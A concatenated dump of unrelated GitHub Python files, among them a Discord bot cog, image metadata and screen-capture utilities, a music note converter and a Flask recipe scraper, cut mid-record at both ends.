\"C:/Users/test/Desktop/评分卡构建/\"\r\napplication_train,bureau,bureau_balance,credit_card_balance,installments_payments,POS_CASH_balance,previous_application = load_date(date_path)\r\n\r\n#application_check = toad.detect(application_train) #检验数据的质量\r\n#display(application_check.head(10))\r\n\r\nprint('top 10 features with high IV') #使用iv来判断数据的区分度\r\ndisplay(toad.quality(application_train.drop(\"SK_ID_CURR\", axis=1), \"TARGET\", iv_only=True)[:10])\r\nprint('top 10 features with the lowest IV')\r\ndisplay(toad.quality(application_train.drop(\"SK_ID_CURR\", axis=1), \"TARGET\", iv_only=True)[-10:])\r\n\r\n","repo_name":"user123-lqh/Score-card","sub_path":"homecredit_step2.py","file_name":"homecredit_step2.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"345808720","text":"#!/usr/bin/python\n\n# Add the two packages to the path\nimport sys\nsys.path.append('project1')\nsys.path.append('project2')\n\n# Import the modules from the two packages\nimport mypackage.module1\nimport mypackage.module2\nimport mypackage.module3\n\nif __name__ == '__main__':\n\t# Create some objects from the first package\n\tp1_foo = mypackage.module1.foo.Foo()\n\tp1_bar = mypackage.module1.bar.Bar()\n\tp1_SomeClass = mypackage.module2.SomeClass()\n\n\t# Create some objects from the second package\n\tp2_bar = mypackage.module3.bar.Bar()\n\tp2_baz = mypackage.module3.baz.Baz()\n\n\t# Show that they all work\n\tp1_foo.run_me()\n\tp1_bar.run_me()\n\tp1_SomeClass.run_me()\n\n\tp2_bar.run_me()\n\tp2_baz.run_me()\n","repo_name":"prschmid/namespacepackage-example","sub_path":"runme.py","file_name":"runme.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"33380926691","text":"from django.db import models\nimport torch\nfrom torch.utils.data import Dataset\n\nif torch.cuda.is_available():\n device = torch.device('cuda')\n print(f\"There are {torch.cuda.device_count()} GPU(s) available.\")\n print(\"Device name: \", torch.cuda.get_device_name(0))\nelse:\n device = torch.device('cpu')\n print(\"There are no GPU(s) available, using the CPU instead.\")\n\n# Create your models here.\n\nclass QADataset(Dataset):\n def __init__(self, encodings, labels):\n self.encodings = encodings\n self.labels = labels\n \n\n def __getitem__(self, idx):\n item = {key: torch.tensor(val[idx]) for key, val in self.encodings.items()}\n # print(self.labels['input_ids'][idx])\n # print(torch.tensor(self.labels['input_ids'][idx]))\n item['labels'] = torch.tensor(self.labels['input_ids'][idx])\n return item\n \n def __len__(self):\n return len(self.labels['input_ids'])\n \nclass ChatDataset(Dataset):\n def __init__(self, inputs, targets, tokenizer):\n self.inputs = inputs.tolist()\n self.targets = targets.tolist()\n\n for idx, i in enumerate(self.inputs):\n try:\n self.inputs[idx] = \" \" + self.inputs[idx] + \" : \" + self.targets[idx+1] + \" \"\n except:\n break\n \n # self.inputs = self.inputs[:-1]\n\n print(self.inputs[0])\n # print(len(self.inputs))\n\n self.inputs_encoded = tokenizer(self.inputs, truncation=True, padding=True, max_length=200, return_tensors='pt')\n self.labels_encoded = tokenizer(self.targets, truncation=True, padding=True, max_length=200, return_tensors='pt')\n self.input_ids = self.inputs_encoded['input_ids']\n self.attention_mask = self.inputs_encoded['attention_mask']\n self.label_input_ids = self.labels_encoded['input_ids']\n \n\n def __len__(self):\n return len(self.inputs)\n \n def __getitem__(self, idx):\n return (self.input_ids[idx], self.attention_mask[idx])","repo_name":"bapvillamil/openai_chat","sub_path":"gpt2_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"43032886105","text":"from PyQt5.QtWidgets import QApplication\nfrom autolocke.ui import MainWindow, TipsDialog, TutorialSteps\nfrom autolocke.textCopy import ImageDiscover\nimport sys\nimport time\n\n\n\"\"\"\nMain file for initializing the GUI (ui.py) and therefore the rest of the \nfunctions.\n\nstylesheet:\nwith open('autolocke\\style.qss', 'r') as f:\n\n\"\"\"\n\nif __name__ == '__main__':\n app = QApplication([])\n with open('autolocke\\style.qss', 'r') as f:\n style = f.read()\n app.setStyleSheet(style)\n tutorial1 = TutorialSteps()\n tutorial1.exec()\n tips_dialog = TipsDialog()\n tips_dialog.exec()\n window = MainWindow()\n window.show()\n app.exec_()\n","repo_name":"muabdali/nuzProject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26363087999","text":"import os\nfrom io import BytesIO\nimport uuid\nimport regex as re\nimport requests\nfrom PIL import Image, ImageDraw, ImageFont\nimport nekos\n\nimport discord\nfrom discord import File\nfrom discord.ext import commands\n\nfrom application import getMessage, commandLine\n\n\nclass Av(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name='dab',\n description='Ereshkigal dabs',\n brief='Eresh dabs')\n async def dab(self, ctx):\n await ctx.send(file=File('application/media/eresh-dab.png'))\n\n @commands.command(name='crab',\n description='--crab ,',\n brief='Crabs')\n async def crab(self, ctx, *args):\n # TODO: subtitles instead of drawtext\n # TODO: line/underlined text\n msg = ''\n for i in range(len(args)):\n msg += args[i]\n msg += \" \"\n\n if len(msg.split(\",\")) != 2:\n await ctx.send(\"Give me 2 messages separated by a comma\")\n return\n\n msg1 = re.sub(r'[\\W_]+', ' ', msg[:-1].upper().split(\",\")[0])\n msg2 = re.sub(r'[\\W_]+', ' ', msg[:-1].upper().split(\",\")[1])\n\n if len(msg1) > 40 or len(msg2) > 40:\n await ctx.send(\"Max message length 40 craracters. Cutting to size.\")\n\n msg1 = msg1[:40]\n msg2 = msg2[:40]\n\n if len(msg1) == 0 and len(msg2) == 0:\n await ctx.send(\"Give me at least one message containing letters and/or numbers\")\n return\n\n video = \"application/media/crab3.mp4\"\n font = \"application/media/migu2m.ttf\"\n max_f_size = \"64\"\n f_color = \"white\"\n\n max_text_width = 1080\n f_size = min(int(max_f_size), max_text_width // max(len(msg1), len(msg2)))\n\n salt = str(uuid.uuid4()).replace(\"-\", \"\")[:5]\n output = f'{msg1}_{msg2}_{salt}.mp4'\n\n line_args1 = f'drawtext=fontfile={font}:text='\n line_args2 = f':fontcolor={f_color}:fontsize={f_size}:bordercolor=black:borderw=2:x=(w-text_w)/2:y=(h-text_h-text_h)/2'\n\n ffmpeg = ['ffmpeg', '-i', f'{video}', '-vf',\n f'[in]{line_args1}{msg1}{line_args2},{line_args1}{msg2}{line_args2}+{f_size}[out]',\n '-codec:a', 'copy', '-preset', 'veryfast', '-y', f'{output}']\n\n commandLine(ffmpeg)\n\n if os.path.exists(output):\n if os.path.getsize(output) > 1024:\n await ctx.send(file=File(output))\n else:\n await ctx.send(\"Something went wrong\")\n\n os.remove(output)\n else:\n await ctx.send(\"Something went wrong\")\n\n @commands.command(name='neko',\n description='neko',\n brief='neko',\n aliases=['nekos'])\n async def neko(self, ctx, category=None):\n allowed_categories = ['feet', 'yuri', 'trap', 'futanari', 'hololewd', 'lewdkemo', 'solog',\n 'feetg', 'cum', 'erokemo', 'les', 'wallpaper', 'lewdk', 'ngif', 'tickle',\n 'lewd', 'feed', 'gecg', 'eroyuri', 'eron', 'cum_jpg', 'bj', 'nsfw_neko_gif',\n 'solo', 'kemonomimi', 'nsfw_avatar', 'gasm', 'poke', 'anal', 'slap', 'hentai',\n 'avatar', 'erofeet', 'holo', 'keta', 'blowjob', 'pussy', 'tits', 'holoero',\n 'lizard', 'pussy_jpg', 'pwankg', 'classic', 'kuni', 'waifu', 'pat', '8ball',\n 'kiss', 'femdom', 'neko', 'spank', 'cuddle', 'erok', 'fox_girl', 'boobs',\n 'random_hentai_gif', 'hug', 'ero', 'smug', 'goose', 'baka', 'woof']\n\n if not category:\n msg = \"```Categories:\\n\\n\"\n msg += \", \".join(allowed_categories)\n msg += \"```\"\n await ctx.send(msg)\n\n elif category in allowed_categories:\n await ctx.send(nekos.img(category))\n\n else:\n await ctx.send(\"Not a valid category. Run `--neko` to see the categories.\")\n\n @neko.error\n async def nekoError(self, ctx, error):\n await ctx.send(f\"Error: {error}\")\n\n @commands.command(name='possufy',\n description='Possufies a video',\n brief='Blame possu',\n aliases=['possu'])\n async def possufy(self, ctx):\n\n def check(m):\n if len(m.attachments) > 0 and m.author == ctx.message.author:\n return m.attachments[0].url.split(\".\")[-1] in ['mp4', 'webm']\n\n await ctx.send(\"Give me a video in the next 20 seconds\")\n\n message = await self.bot.wait_for('message', check=check, timeout=20.0)\n response = requests.get(message.attachments[0].url)\n\n fname = str(uuid.uuid4()).replace(\"-\", \"\")[:10] + \".\" + message.attachments[0].url.split(\".\")[-1]\n output = \"possufied_\" + fname.split(\".\")[0] + \".mp4\"\n\n with open(fname, 'wb') as f:\n f.write(BytesIO(response.content).read())\n\n ffmpeg = [\"ffmpeg\", \"-i\", f\"{fname}\", \"-i\", f\"{fname}\", \"-c:v\", \"libx264\", \"-preset\", \"ultrafast\",\n \"-s\", \"128x96\", \"-filter:v\", \"fps=10\", \"-crf\", \"51\", \"-c:a\", \"libopus\", \"-ac\", \"1\", \"-ar\",\n \"8000\", \"-b:a\", \"1k\", \"-vbr\", \"constrained\", \"-strict\", \"-2\", \"-shortest\", f\"{output}\"]\n\n commandLine(ffmpeg)\n\n if os.path.exists(fname) and os.path.exists(output):\n if os.path.getsize(fname) > 1024:\n await ctx.send(file=File(output))\n else:\n await ctx.send(\"Something went wrong\")\n\n os.remove(fname)\n os.remove(output)\n else:\n await ctx.send(\"Something went wrong\")\n\n @possufy.error\n async def adminError(self, ctx, error):\n if isinstance(error, commands.NotOwner):\n await ctx.send(getMessage(\"notOwner\"))\n\n @commands.command(name='pikachu',\n description='--pikachu row1, row2, row3',\n brief='Surprised Pikachu',\n aliases=['pika'])\n async def pikachu(self, ctx, *args):\n hq = False\n if not args:\n text = \"Käyttäjä: Testaa komentoa ilman tekstiä, Teksti:, Käyttäjä:\"\n else:\n if args[0] in (\"-hq\", \"-h\", \"-high\", \"--hq\", \"--h\", \"--high\"):\n args = args[1:]\n hq = True\n\n text = \" \".join(args)\n\n text_rows = text.replace(\", \", \"\\n\").replace(\",\", \"\\n\").strip().split(\"\\n\")\n text = \"\\n\".join(text_rows).strip()\n\n fontsize = 36\n line_spacing = 3\n # font = ImageFont.truetype(\"application/media/NotoSansCJKjp-Regular.otf\", size=fontsize)\n font = ImageFont.truetype(\"application/media/migu2m.ttf\", size=fontsize)\n\n if hq:\n img = Image.open(\"application/media/pika-hq.png\")\n else:\n img = Image.open(\"application/media/pika.png\")\n\n img = img.copy().convert(\"RGB\")\n img_width, img_height = img.size\n line_max_chars = int(img_width / fontsize * 2) # Japanese characters take up 2\n rows = list()\n current_row = \"\"\n row_len = 0\n pattern = re.compile(r'([0-9]|[A-z]|[\\p{IsHan}\\p{IsBopo}\\p{IsHira}\\p{IsKatakana}]+)', re.UNICODE)\n\n for i, c in enumerate(text):\n\n c_len = 2 if re.search(pattern, c) else 1\n\n if re.search('([ァ-ン゙゚])', c):\n c_len = 1\n\n # Newline\n if c == \"\\n\":\n rows.append(current_row)\n current_row = \"\"\n row_len = 0\n\n # Below max\n elif row_len + c_len < line_max_chars:\n current_row += c\n row_len += c_len\n\n if i == len(text) - 1:\n rows.append(current_row)\n\n # Exact\n elif row_len + c_len == line_max_chars:\n current_row += c\n rows.append(current_row)\n current_row = \"\"\n row_len = 0\n\n # Over\n elif row_len + c_len > line_max_chars:\n rows.append(current_row)\n current_row = c\n row_len = c_len\n\n rows = rows[:20]\n text = \"\\n\".join(rows)\n text_height = fontsize * len(rows) + line_spacing * len(rows)\n\n canvas = Image.new(\"RGB\", (img_width, img_height + text_height), color=\"#FFFFFF\")\n canvas.paste(img, (0, text_height))\n\n if text:\n draw = ImageDraw.Draw(canvas)\n draw.multiline_text((0, 0), text, fill=\"black\", font=font, anchor=None, spacing=line_spacing, align=\"left\")\n del draw\n\n arr = BytesIO()\n canvas.save(arr, format='PNG')\n arr.seek(0)\n\n else:\n arr = BytesIO()\n img.save(arr, format='PNG')\n arr.seek(0)\n\n await ctx.send(file=discord.File(arr, filename='pikachu.png'))\n\n\ndef setup(bot):\n bot.add_cog(Av(bot))\n","repo_name":"Vogelchevalier/ereshBot","sub_path":"application/cogs/av.py","file_name":"av.py","file_ext":"py","file_size_in_byte":8994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"20262571412","text":"li = [{'personName': 'oil', 'personId': '41f3c76d-5bee-418b-8f65-5233b3521789'}, \n {'personName': 'golf', 'personId': '506ec04e-8a43-4e44-9843-2a411ab36146'}, \n {'personName': 'sprite', 'personId': '7f96cced-fe6c-4ed4-8332-33a0c36f6aeb'}, \n {'personName': 'gene', 'personId': 'd30f428e-0a15-4eb5-9f07-d5886dd5a574'}, \n {'personName': 'ice', 'personId': 'f29d819f-8b24-4bb6-bd17-055bc64ed32c'}]\n\nfunctions = [{'describe': 'Open Camera', 'function_name': 'open_camera'},\n {'describe': 'Azure Camera', 'function_name': 'azure_camera'},\n {'describe': 'List Group', 'function_name': 'list_group'},\n {'describe': 'List person', 'function_name': 'list_person'},\n {'describe': 'Create Group', 'function_name': 'create_group'},\n {'describe': 'Create Person Group', 'function_name': 'create_person_group'},\n {'describe': 'Detection', 'function_name': 'detection'},\n {'describe': 'Sync Person', 'function_name': 'sync_person'},\n {'describe': 'Quit', 'function_name': 'quit'}]\n\nprint(li[0])\nprint(li[0]['personName'])\n\ndef open_camera():\n print('open camera')\n\n\ndef azure_camera():\n print('azure_camera')\n\n\nfor i in range(len(functions)):\n print(\"\\t\"+str(i+1)+\". \"+str(functions[i]['describe']))\n\n\nselect = input('Select: ')\n\nif str(select).isdigit() and int(select) >= 0 and int(select) <= len(functions):\n locals()[functions[int(select)-1]['function_name']]()\nelse:\n print(\"Please input number in range only\")","repo_name":"wnalina/project-61","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73469909901","text":"import csv\nimport os\nimport exifread\nfrom util.libreria import *\n\nnombre_carpeta = 'files'\ncsv_file_path = 'metadata.csv'\n\n\ndef get_metadata_del_map(nombre_carpeta):\n try:\n contenido = os.listdir(nombre_carpeta)\n metadata_map = {}\n\n '''\n Lee directorio y construye un diccionario con los metadatos de todos los archivos\n '''\n print(f\"leyendo metadatos de los archivos\")\n for archivo in contenido:\n image_path = os.path.join(nombre_carpeta, archivo)\n # if 'A00B64A62873' in archivo:\n metadata = get_archivo_metadata(image_path, archivo)\n metadata_map[archivo] = metadata\n\n return metadata_map\n\n except Exception as e:\n print(f\"😱 Error al crear el mapa de metadatos: {e}\")\n return {}\n\n\ndef get_archivo_metadata(file_path, archivo):\n \"\"\"\n Lee los metadatos de un archivo de imagen.\n\n Args:\n file_path (str): La ruta al archivo de imagen.\n\n Returns:\n dict: Un diccionario con los metadatos del archivo.\n \"\"\"\n try:\n metadata = {}\n\n _, extension = os.path.splitext(file_path)\n\n if extension.lower() in ('.jpg', '.jpeg', '.png', '.gif'):\n with open(file_path, 'rb') as f:\n metadata = exifread.process_file(f)\n\n gps_latitude = metadata.get('GPS GPSLatitude')\n gps_longitude = metadata.get('GPS GPSLongitude')\n gps_latitude_ref = metadata.get('GPS GPSLatitudeRef')\n gps_longitude_ref = metadata.get('GPS GPSLongitudeRef')\n exif_date_time_original = metadata.get('EXIF DateTimeOriginal')\n\n if gps_latitude is not None and gps_longitude is not None and gps_latitude_ref is not None and gps_longitude_ref is not None:\n latitude = convert_to_decimal(gps_latitude)\n longitude = convert_to_decimal(gps_longitude)\n\n if gps_latitude_ref.values == 'S':\n latitude = -latitude\n if gps_longitude_ref.values == 'W':\n longitude = -longitude\n\n return latitude, longitude, exif_date_time_original\n\n elif extension.lower() == '.heic':\n metadata = read_metadata_exiftool(file_path)\n\n gps_latitude = metadata.get('GPSLatitude')\n gps_longitude = metadata.get('GPSLongitude')\n gps_latitude_ref = metadata.get('GPSLatitudeRef')\n gps_longitude_ref = metadata.get('GPSLongitudeRef')\n exif_date_time_original = metadata.get('FileModifyDate')\n\n if gps_latitude is not None and gps_longitude is not None and gps_latitude_ref is not None and gps_longitude_ref is not None:\n latitude = convert_to_decimal_heic(gps_latitude)\n longitude = convert_to_decimal_heic(gps_longitude)\n\n if gps_latitude_ref == 'S':\n latitude = -latitude\n if gps_longitude_ref == 'W':\n longitude = -longitude\n\n return latitude, longitude, exif_date_time_original\n\n return metadata\n except Exception as e:\n print(f\"😱 Error al leer los metadatos del archivo {file_path}: {e}\")\n\n\ndef create_csv_from_map(metadata_map, csv_file_path):\n try:\n with open(csv_file_path, 'w', newline='') as csv_file:\n csv_writer = csv.writer(csv_file)\n csv_writer.writerow(['Archivo', 'Tag', 'Latitud', 'Longitud', 'Fecha']) # Cabecera\n\n print(f\"Escribiendo el csv con los metadatos\")\n for archivo, metadata in metadata_map.items():\n if isinstance(metadata, dict):\n gps_latitude = \"No hay parametros en el archivo para latitud\"\n gps_longitude = \"No hay parametros en el archivo para longitud\"\n date = \"No hay parametros en el archivo para fecha\"\n else:\n gps_latitude = metadata[0] if len(metadata) > 0 else \"No hay parametros en el archivo para latitud\"\n gps_longitude = metadata[1] if len(\n metadata) > 1 else \"No hay parametros en el archivo para longitud\"\n date = metadata[2] if len(metadata) > 2 else \"No hay parametros en el archivo para fecha\"\n\n row_data = [archivo, 'GPS Coordinates', gps_latitude, gps_longitude, date]\n csv_writer.writerow(row_data)\n # print(f\"{archivo} Latitud/Longitud: {gps_latitude}, {gps_longitude}, Fecha: {date}\")\n\n except Exception as e:\n print(f\"😱 Error al crear el archivo {archivo} CSV de metadatos {metadata} \"\n f\":ERROR {e}\")\n\n\nmetadata_map = get_metadata_del_map(nombre_carpeta)\ncreate_csv_from_map(metadata_map, csv_file_path)\n\nprint(f\"🚀 Se han escrito los metadatos en el archivo {csv_file_path}\")\n","repo_name":"rommelayala/metadata","sub_path":"metadata_fotos.py","file_name":"metadata_fotos.py","file_ext":"py","file_size_in_byte":4896,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32808508227","text":"import os\nimport sys\n\nimport win32gui\nimport win32ui\n\nimport cv2\nimport numpy as np\nimport win32con\n\n\nclass Image_Processor:\n\n def __init__(self):\n self.desktop = win32gui.GetDesktopWindow()\n self.gtawin = win32gui.FindWindow(None, \"Grand Theft Auto V\")\n\n\n def grab_screen(self):\n \"\"\"\n grab_screen\n\n Grab game screen in the window named 'winName'\n :param winName: Name of the game window to be captured\n :return: Numpy array\n \"\"\"\n desktop = self.desktop\n\n # get area by a window name\n gtawin = self.gtawin\n # get the bounding box of the window\n x_left, y_up, x_right, y_down = win32gui.GetWindowRect(gtawin)\n # cut window boarders\n \"\"\"\n Note: Windows coordinate system\n (origin)------------> x_right, y_up\n |\n |\n v x_left, y_down\n \"\"\"\n y_up += 32\n x_left += 3\n y_down -= 4\n x_right -= 4\n width = x_right - x_left + 1\n height = y_down - y_up + 1\n\n # the device context(DC) for the entire window (title bar, menus, scroll bars, etc.)\n hwindc = win32gui.GetWindowDC(desktop)\n # Create a DC object from an integer handle\n srcdc = win32ui.CreateDCFromHandle(hwindc)\n # Create a memory device context that is compatible with the source DC\n memdc = srcdc.CreateCompatibleDC()\n # Create a bitmap object\n bmp = win32ui.CreateBitmap()\n # Create a bitmap compatible with the specified device context\n bmp.CreateCompatibleBitmap(srcdc, width, height)\n # Select an object into the device context.\n memdc.SelectObject(bmp)\n # Copy a bitmap from the source device context to this device context\n # parameters: destPos, size, dc, srcPos, rop(the raster operation))\n memdc.BitBlt((0, 0), (width, height), srcdc, (x_left, y_up), win32con.SRCCOPY)\n\n # the bitmap bits\n signedIntsArray = bmp.GetBitmapBits(True)\n # form a 1-D array initialized from text data in a string.\n img = np.fromstring(signedIntsArray, dtype='uint8')\n img.shape = (height, width, 4)\n\n # Delete all resources associated with the device context\n srcdc.DeleteDC()\n memdc.DeleteDC()\n # Releases the device context\n win32gui.ReleaseDC(desktop, hwindc)\n # Delete the bitmap and freeing all system resources associated with the object.\n # After the object is deleted, the specified handle is no longer valid.\n win32gui.DeleteObject(bmp.GetHandle())\n\n return cv2.cvtColor(img, cv2.COLOR_RGBA2RGB)\n\n def predict(self, img, knn):\n ret, result, neighbours, dist = knn.findNearest(img, k=1)\n return result\n\n def preprocess(self, img):\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n thr = cv2.adaptiveThreshold(gray, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 7, -5)\n return thr\n\n def convert_speed(self, num1, num2, num3):\n hundreds = 1\n tens = 1\n speed = 0\n\n if num3[0][0] != 10:\n hundreds = 10\n tens = 10\n speed += int(num3[0][0])\n if num2[0][0] != 10:\n speed += tens * int(num2[0][0])\n hundreds = tens * 10\n if num1[0][0] != 10:\n speed += hundreds * int(num1[0][0])\n\n return speed\n\n def img_process(self, winName: str = \"Grand Theft Auto V\"):\n screen = self.grab_screen(winName)\n\n numbers = self.preprocess(screen[567:575, 683:702, :])\n\n # three fields for numbers\n num1 = self.predict(numbers[:, :5].reshape(-1, 40).astype(np.float32), self.knnDigits)\n num2 = self.predict(numbers[:, 7:12].reshape(-1, 40).astype(np.float32), self.knnDigits)\n num3 = self.predict(numbers[:, -5:].reshape(-1, 40).astype(np.float32), self.knnDigits)\n\n direct = self.preprocess(screen[561:570, 18:28, :]).reshape(-1, 90).astype(np.float32)\n direct = int(self.predict(direct, self.knnArrows)[0][0])\n\n speed = self.convert_speed(num1, num2, num3)\n resized = cv2.resize(screen, (320, 240))\n\n return screen, resized, speed, direct\n\n\n\n\n","repo_name":"DveloperY0115/GrandTheftAutopilot","sub_path":"Autopilot/core/img_process.py","file_name":"img_process.py","file_ext":"py","file_size_in_byte":4205,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"47"} +{"seq_id":"42174867559","text":"from collections import Counter\n\nnote_line_codes = [\"1\", \"4\", \"7\", \"8\", \"9\",\n \"10\", \"11\", \"12\", \"23\", \"24\", \"28\", \"44\"]\n\npitches = [\"G\", \"A\", \"B\", \"C\", \"D\", \"E\", \"F\"]\nkommas = [9, 9, 4, 9, 9, 4, 9]\n\n\ndef convert_to_sharp(note):\n \"\"\"\n Converts notes with accidental symbols to all sharp rep.'s\n\n G --> G, \n Bb9 --> A, \n Eb4 --> D#5, \n Bb1 --> A#8, \n Bb13 --> G#5, \n Gb5 --> F#4, \n F#4 --> F#4, \n E#4 --> F, \n E#5 --> F#1, \n E#13 --> G\n \"\"\"\n\n if len(note) == 1:\n return note\n\n accidental = note[1]\n if accidental not in [\"#\", \"b\"]:\n raise ValueError(\"Accidental symbol unrecognised!\")\n\n root = note[0]\n idx = pitches.index(root)\n komma = int(note[2:])\n next_root, result = None, None\n remaining_komma = komma\n\n if accidental == \"b\":\n while remaining_komma > 0:\n idx = (idx - 1) % 7\n next_root = pitches[idx]\n remaining_komma -= kommas[idx]\n\n result = next_root\n if remaining_komma < 0:\n result += \"#\" + str(-1 * remaining_komma)\n\n elif accidental == \"#\":\n while remaining_komma > 0:\n remaining_komma -= kommas[idx]\n idx = (idx + 1) % 7\n next_root = pitches[idx]\n\n if remaining_komma < 0:\n idx = (idx - 1) % 7\n next_root = pitches[idx]\n remaining_komma += kommas[idx]\n\n result = next_root\n if remaining_komma != 0:\n result += \"#\" + str(remaining_komma)\n\n return result\n\n\ndef get_notes_as_pitch_classes(file_list, makam=None):\n all_notes = []\n counts = Counter()\n\n for file_path in file_list:\n if makam and makam + \"--\" not in file_path:\n continue\n\n with open(file_path, \"r\") as in_file:\n lines = in_file.readlines()\n notes = []\n for line in lines:\n tokens = line.split(\"\\t\")\n if tokens[1] in note_line_codes:\n note = tokens[3]\n if note == \"Es\" or (not note[1].isdigit()):\n continue\n\n pitch_class = convert_to_sharp(note[0] + note[2:])\n notes.append(pitch_class)\n\n all_notes.append(notes)\n counts.update(notes)\n\n return all_notes, counts\n","repo_name":"ihpar/musvec","sub_path":"note_reader.py","file_name":"note_reader.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29851001027","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\n# Ler os dados de um arquivo CSV\ndf = pd.read_csv('dados.csv')\n\n# Criar um gráfico de linha\nplt.plot(df['Data'], df['Valor'])\n\n# Adicionar títulos e rótulos\nplt.title('Dados de exemplo')\nplt.xlabel('Data')\nplt.ylabel('Valor')\n\n# Exibir o gráfico\nplt.show()\n","repo_name":"JuanBindez/CSVGraphc-v1.0-alpha","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"70893409102","text":"from datetime import time\nimport bs4\nimport os # 判斷文件存在\nimport requests\nimport json\nfrom flask import Flask, request, jsonify\n\napp = Flask(__name__, static_folder='../build', static_url_path='/')\n\n@app.route('/')\ndef index():\n return app.send_static_file('index.html')\n\n@app.route('/api/goodfoodcategory')\ndef get_recipes_category():\n url = \"https://www.bbcgoodfood.com/recipes/category/all-healthy\"\n headers = {\n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n params = {}\n response = requests.get(url, headers=headers, params=params)\n soup = bs4.BeautifulSoup(response.text, \"html.parser\")\n # print(soup)\n recipes_contact = soup.find_all('article', class_='card text-align-left card--with-borders')\n\n data_list=[]\n for recipes_contact_card in recipes_contact:\n recipes_contact_card_img = recipes_contact_card.find('img')['src']\n # print('recipes_contact_card_img = ', recipes_contact_card_img)\n recipes_contact_card_desc = recipes_contact_card.find('p').getText()\n # print('recipes_contact_card_desc = ', recipes_contact_card_desc)\n recipes_contact_card_link = recipes_contact_card.find('a')['href']\n # print('recipes_contact_card_link = ', recipes_contact_card_link)\n recipes_contact_card_title = recipes_contact_card.find('h2').getText()\n # print('recipes_contact_card_title = ', recipes_contact_card_title)\n data_list.append({'card_link':recipes_contact_card_link , 'card_title': recipes_contact_card_title,'card_img':recipes_contact_card_img , 'card_desc': recipes_contact_card_desc})\n \n # content = recipes_contact_card.getText()\n # print('content = ', content)\n json_string = json.dumps({'data': data_list})\n # 爬完匯入到json檔\n save_path = 'D:/tailwind_recipes/src/jsonfile'\n complete_name = os.path.join(save_path,'recipes_category.json') \n with open(complete_name, 'w') as outfile:\n outfile.write(json_string)\n\n return jsonify({'data': data_list})\n\n@app.route('/api/goodfoodcollection', methods=['GET', 'POST'])\ndef get_recipes_collection():\n url = \"https://www.bbcgoodfood.com\" + request.get_json()['collection']\n headers = {\n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n params = {}\n response = requests.get(url, headers=headers, params=params)\n soup = bs4.BeautifulSoup(response.text, \"html.parser\")\n # print(soup)\n recipes_collection = soup.find_all('article', class_='card text-align-left card--horizontal card--inline')\n\n data_list=[]\n for collection_contact_card in recipes_collection:\n collection_contact_card_img = collection_contact_card.find('img')['src']\n # print('collection_contact_card_img = ', collection_contact_card_img)\n collection_contact_card_desc = collection_contact_card.find('p').getText()\n # print('collection_contact_card_desc = ', collection_contact_card_desc)\n collection_contact_card_link = collection_contact_card.find('a')['href']\n # print('collection_contact_card_link = ', collection_contact_card_link)\n collection_contact_card_title = collection_contact_card.find('h2').getText()\n # print('collection_contact_card_title = ', collection_contact_card_title)\n collection_contact_card_rating = collection_contact_card.find('span', class_='rating__count-text body-copy-small').getText()\n data_list.append({'card_rating': collection_contact_card_rating,'card_link':collection_contact_card_link , 'card_title': collection_contact_card_title,'card_img':collection_contact_card_img , 'card_desc': collection_contact_card_desc})\n\n json_string = json.dumps({'data': data_list})\n # 爬完匯入到json檔\n save_path = 'D:/tailwind_recipes/src/jsonfile'\n complete_name = os.path.join(save_path,'recipes_collection'+request.get_json()['type'].replace(\":\", \"\")) \n if os.path.exists(complete_name):\n with open(complete_name+'.json', 'r') as outfile:\n old_data = outfile.read()\n\n with open(complete_name +'.json', 'w') as outfile:\n outfile.write(json_string)\n\n return jsonify({'data': data_list})\n\n@app.route('/api/goodfoodrecipescontact', methods=['GET', 'POST'])\ndef get_recipes_contact():\n url = \"https://www.bbcgoodfood.com\" + request.get_json()['cardLink']\n headers = {\n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n params = {}\n response = requests.get(url, headers=headers, params=params)\n soup = bs4.BeautifulSoup(response.text, \"html.parser\")\n # print(soup)\n recipes_title = soup.find_all('h1', class_='heading-1')\n recipes_ingredients_items = soup.find_all('li', class_='pb-xxs pt-xxs list-item list-item--separator')\n recipes_method_items = soup.find_all('li', class_='pb-xs pt-xs list-item')\n \n ingredients=[]\n method=[]\n\n for title in recipes_title:\n title_text = title.getText()\n\n for items in recipes_ingredients_items:\n ingredients_items = items.getText()\n ingredients.append(ingredients_items)\n\n for steps in recipes_method_items:\n steps_heading = steps.find('span').getText()\n steps_editor_conten = steps.find('div').getText()\n method.append({'steps_heading': steps_heading, 'steps_editor_conten': steps_editor_conten})\n\n json_string = json.dumps({'data': {'title':title_text, 'ingredients':ingredients, 'method':method}})\n # # 爬完匯入到json檔\n save_path = 'D:/tailwind_recipes/src/jsonfile'\n complete_name = os.path.join(save_path,'recipes_contact_'+title_text) \n if os.path.exists(complete_name):\n with open(complete_name+'.json', 'r') as outfile:\n old_data = outfile.read()\n\n with open(complete_name +'.json', 'w') as outfile:\n 